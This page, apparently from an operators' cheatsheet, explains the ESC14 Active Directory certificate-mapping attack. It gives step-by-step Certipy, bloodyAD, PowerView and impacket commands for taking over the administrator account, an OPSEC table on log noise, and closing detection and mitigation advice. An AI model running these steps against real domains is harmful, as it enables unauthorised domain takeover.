daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

esc14-weak-explicit-certificate-mapping.md (9526B)


      1 ---
      2 title: "ESC14 — Weak Explicit Certificate Mapping"
      3 description: "ESC14 targets the altSecurityIdentities attribute on AD user and computer objects. This multi-valued attribute is used for explicit certificate-to-account…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "privilege-escalation", "hashing"]
      7 tools: ["Impacket", "Certipy", "BloodHound", "ldapsearch", "OpenSSL"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC14 — Weak Explicit Certificate Mapping.md"
     11 ---
     12 # ESC14 — Weak Explicit Certificate Mapping
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Explicit Certificate Mapping Abuse |
     19 | **Difficulty** | Medium |
     20 | **Pre-requisites** | Write access to `altSecurityIdentities` OR existing weak mapping on target |
     21 | **Tools** | Certipy, BloodHound, PowerView, LDAP tools |
     22 | **OPSEC Noise** | Medium — AD attribute modification |
     23 | **One-liner** | Abuse weak explicit certificate mappings in `altSecurityIdentities` to bind your own certificate to a privileged account, or manipulate your account attributes to match an existing weak mapping on a target. |
     24 
     25 ***
     26 
     27 ## What Is ESC14?
     28 
     29 ESC14 targets the `altSecurityIdentities` attribute on AD user and computer objects. This multi-valued attribute is used for **explicit certificate-to-account mapping** — it tells the DC "when this specific certificate is presented, map it to this specific account." The values in this attribute define **how** the mapping is performed.
     30 
     31 The vulnerability: Windows supports multiple mapping types, and some are **cryptographically weak** — they rely on easily spoofable identifiers like the Subject Common Name or Issuer DN rather than unique, cryptographic identifiers like serial numbers or public key hashes.
     32 
     33 ESC14 has **two distinct attack scenarios**:
     34 
     35 | Scenario | Pre-requisite | Method |
     36 |----------|--------------|--------|
     37 | **ESC14a — Write Access** | `GenericWrite` on target's `altSecurityIdentities` | Add your own certificate mapping to the target account |
     38 | **ESC14b — Existing Weak Mapping** | Target already has a weak mapping + `GenericWrite` on your own account | Modify your attributes to match the target's weak mapping criteria |
     39 
     40 ***
     41 
     42 ## Certificate Mapping Types — Strong vs Weak
     43 
     44 The `altSecurityIdentities` attribute supports these formats:
     45 
     46 | Mapping Type | Format | Strength | Spoofable? |
     47 |-------------|--------|----------|------------|
     48 | `X509:<I>issuer<S>subject` | Issuer + Subject DN | 🟡 Weak | ✅ If you control subject |
     49 | `X509:<S>subject` | Subject DN only | 🔴 Very Weak | ✅ Easily |
     50 | `X509:<I>issuer<SR>serial` | Issuer + Serial Number | 🟢 Strong | ❌ |
     51 | `X509:<SKI>keyid` | Subject Key Identifier | 🟢 Strong | ❌ |
     52 | `X509:<SHA1-PUKEY>hash` | SHA1 of Public Key | 🟢 Strong | ❌ |
     53 | `X509:<RFC822>email` | RFC822 email (SAN) | 🔴 Very Weak | ✅ |
     54 
     55 > ⚠️ The weak types (`X509:<S>`, `X509:<I><S>`, `X509:<RFC822>`) can be exploited because the attacker can **craft a certificate** (or modify their own AD attributes) to match the mapping criteria.
     56 
     57 ***
     58 
     59 ## Required Conditions
     60 
     61 ### ESC14a — Write Access to altSecurityIdentities
     62 
     63 | Condition | Notes |
     64 |-----------|-------|
     65 | `GenericWrite` or `WriteProperty` on target's `altSecurityIdentities` | BloodHound ACE edge |
     66 | You control a certificate (any cert you can authenticate with) | Even a self-signed cert works if added to NTAuthCA |
     67 | **OR** access to legitimate enrollment | Standard ADCS enrollment |
     68 
     69 ### ESC14b — Existing Weak Mapping
     70 
     71 | Condition | Notes |
     72 |-----------|-------|
     73 | Target account has a weak `altSecurityIdentities` mapping | `X509:<S>` or `X509:<I><S>` format |
     74 | You have `GenericWrite` on **your own** account (or a controlled account) | To modify attributes to match the mapping |
     75 | Access to a Client Auth template for enrollment | Standard ADCS enrollment |
     76 
     77 ***
     78 
     79 ## Step 0 — Enumeration
     80 
     81 ```bash
     82 # Check for altSecurityIdentities on high-value targets
     83 # From Linux via LDAP
     84 ldapsearch -x -H ldap://$TARGET -D 'lowpriv@domain.htb' -w 'Password123!' \
     85   -b "DC=domain,DC=htb" \
     86   '(altSecurityIdentities=*)' dn altSecurityIdentities
     87 
     88 # From PowerShell
     89 Get-ADUser -Filter {altSecurityIdentities -like '*'} \
     90   -Properties altSecurityIdentities | 
     91   Select-Object Name, altSecurityIdentities
     92 
     93 # Check for computer accounts too
     94 Get-ADComputer -Filter {altSecurityIdentities -like '*'} \
     95   -Properties altSecurityIdentities |
     96   Select-Object Name, altSecurityIdentities
     97 ```
     98 
     99 ### BloodHound Queries
    100 
    101 ```cypher
    102 // Find principals with write access to altSecurityIdentities on admin accounts
    103 MATCH (n)-[r:GenericWrite|GenericAll|WriteProperty]->(m:User)
    104 WHERE m.admincount = True
    105 RETURN n.name, type(r), m.name
    106 
    107 // Find accounts with altSecurityIdentities set
    108 MATCH (n:User) WHERE n.altsecurityidentities IS NOT NULL
    109 RETURN n.name, n.altsecurityidentities
    110 ```
    111 
    112 ***
    113 
    114 ## ESC14a — Write Access Attack Chain
    115 
    116 When you have write access to a target's `altSecurityIdentities`, you simply **add a mapping** that points to a certificate you control.
    117 
    118 ### Step 1 — Request a Certificate for Yourself
    119 
    120 ```bash
    121 certipy-ad req \
    122   -u 'lowpriv@domain.htb' \
    123   -p 'Password123!' \
    124   -dc-ip $TARGET \
    125   -ca 'DOMAIN-CA-NAME' \
    126   -template 'User'
    127 
    128 # Output: lowpriv.pfx
    129 ```
    130 
    131 ### Step 2 — Extract Certificate Details
    132 
    133 ```bash
    134 # Get the Subject DN from your certificate
    135 certipy-ad cert -pfx lowpriv.pfx -nokey -out lowpriv.crt
    136 openssl x509 -in lowpriv.crt -noout -subject -issuer
    137 
    138 # Output example:
    139 # subject= /DC=htb/DC=domain/CN=Users/CN=lowpriv
    140 # issuer= /DC=htb/DC=domain/CN=DOMAIN-CA
    141 ```
    142 
    143 ### Step 3 — Add Explicit Mapping to Target Account
    144 
    145 ```bash
    146 # Using BloodyAD
    147 bloodyAD -d 'domain.htb' -u 'lowpriv' -p 'Password123!' --host $TARGET \
    148   set object administrator altSecurityIdentities \
    149   -v "X509:<I>DC=htb,DC=domain,CN=DOMAIN-CA<S>DC=htb,DC=domain,CN=Users,CN=lowpriv"
    150 
    151 # Using PowerView
    152 Set-DomainObject -Identity administrator \
    153   -Set @{'altSecurityIdentities'='X509:<I>DC=htb,DC=domain,CN=DOMAIN-CA<S>DC=htb,DC=domain,CN=Users,CN=lowpriv'}
    154 ```
    155 
    156 ### Step 4 — Authenticate as Administrator Using Your Certificate
    157 
    158 ```bash
    159 certipy-ad auth \
    160   -pfx lowpriv.pfx \
    161   -username administrator \
    162   -domain domain.htb \
    163   -dc-ip $TARGET
    164 
    165 # The DC checks administrator's altSecurityIdentities
    166 # Finds a mapping matching your cert's Issuer+Subject
    167 # Grants you access as administrator
    168 ```
    169 
    170 ### Step 5 — Clean Up (Remove the Mapping)
    171 
    172 ```bash
    173 bloodyAD -d 'domain.htb' -u 'lowpriv' -p 'Password123!' --host $TARGET \
    174   set object administrator altSecurityIdentities -v ""
    175 ```
    176 
    177 ***
    178 
    179 ## ESC14b — Existing Weak Mapping Attack Chain
    180 
    181 When the target already has a weak explicit mapping, you modify **your own account** to match the mapping criteria.
    182 
    183 ### Example Scenario
    184 
    185 Target: `admin-svc` has mapping:
    186 ```
    187 altSecurityIdentities: X509:<S>CN=Admin Service Account
    188 ```
    189 
    190 This mapping only checks the Subject CN — anyone with a cert where `CN=Admin Service Account` will be mapped to this account.
    191 
    192 ### Step 1 — Modify Your Account's CN (If Possible)
    193 
    194 ```bash
    195 # If you have GenericWrite on an account, modify its CN to match
    196 # More commonly: create a new computer account with matching attributes
    197 impacket-addcomputer \
    198   'domain.htb/lowpriv:Password123!' \
    199   -dc-ip $TARGET \
    200   -computer-name 'Admin Service Account$' \
    201   -computer-pass 'EvilPass!'
    202 ```
    203 
    204 ### Step 2 — Request Certificate with Matching Subject
    205 
    206 ```bash
    207 certipy-ad req \
    208   -u 'Admin Service Account$@domain.htb' \
    209   -p 'EvilPass!' \
    210   -dc-ip $TARGET \
    211   -ca 'DOMAIN-CA-NAME' \
    212   -template 'Machine'
    213 
    214 # The cert's Subject CN will match the weak mapping
    215 ```
    216 
    217 ### Step 3 — Authenticate as the Target
    218 
    219 ```bash
    220 certipy-ad auth \
    221   -pfx 'admin service account.pfx' \
    222   -username 'admin-svc' \
    223   -domain domain.htb \
    224   -dc-ip $TARGET
    225 ```
    226 
    227 ***
    228 
    229 ## OPSEC Considerations
    230 
    231 | Action | Log Generated | Noise Level |
    232 |--------|--------------|-------------|
    233 | Reading altSecurityIdentities | LDAP query — low noise | 🟢 Low |
    234 | Writing altSecurityIdentities | Event ID 5136 (Directory Service Changes) | 🔴 High |
    235 | Certificate enrollment | Event ID 4886/4887 | 🟢 Low |
    236 | Auth with explicit mapping | Event ID 4768 | 🟡 Medium |
    237 
    238 ***
    239 
    240 ## Detection Indicators
    241 
    242 - **Event ID 5136** — Modification of `altSecurityIdentities` attribute, especially on privileged accounts
    243 - **Event ID 4768** — Certificate-based TGT request where the mapping source is `altSecurityIdentities` rather than UPN/SAN
    244 - **Audit `altSecurityIdentities`** — Any value using weak mapping types (`X509:<S>`, `X509:<RFC822>`) on privileged accounts is a finding
    245 - **BloodHound** — `GenericWrite` or `WriteProperty` edges to accounts with `altSecurityIdentities` set
    246 
    247 ***
    248 
    249 ## Mitigation
    250 
    251 - **Use only strong mapping types** — Replace all `X509:<S>` and `X509:<I><S>` mappings with `X509:<I><SR>` (Issuer + Serial) or `X509:<SHA1-PUKEY>` (SHA1 Public Key Hash)
    252 - **Restrict write access to `altSecurityIdentities`** — Only Tier 0 admins should be able to modify this attribute on any account
    253 - **Audit all existing mappings** — Run a domain-wide query for `altSecurityIdentities` and review every value
    254 - **Set `StrongCertificateBindingEnforcement = 2`** — Forces SID-based validation on implicit mappings, though explicit mappings via `altSecurityIdentities` may still work
    255 - **Monitor for attribute changes** — Alert on any modification to `altSecurityIdentities` on privileged accounts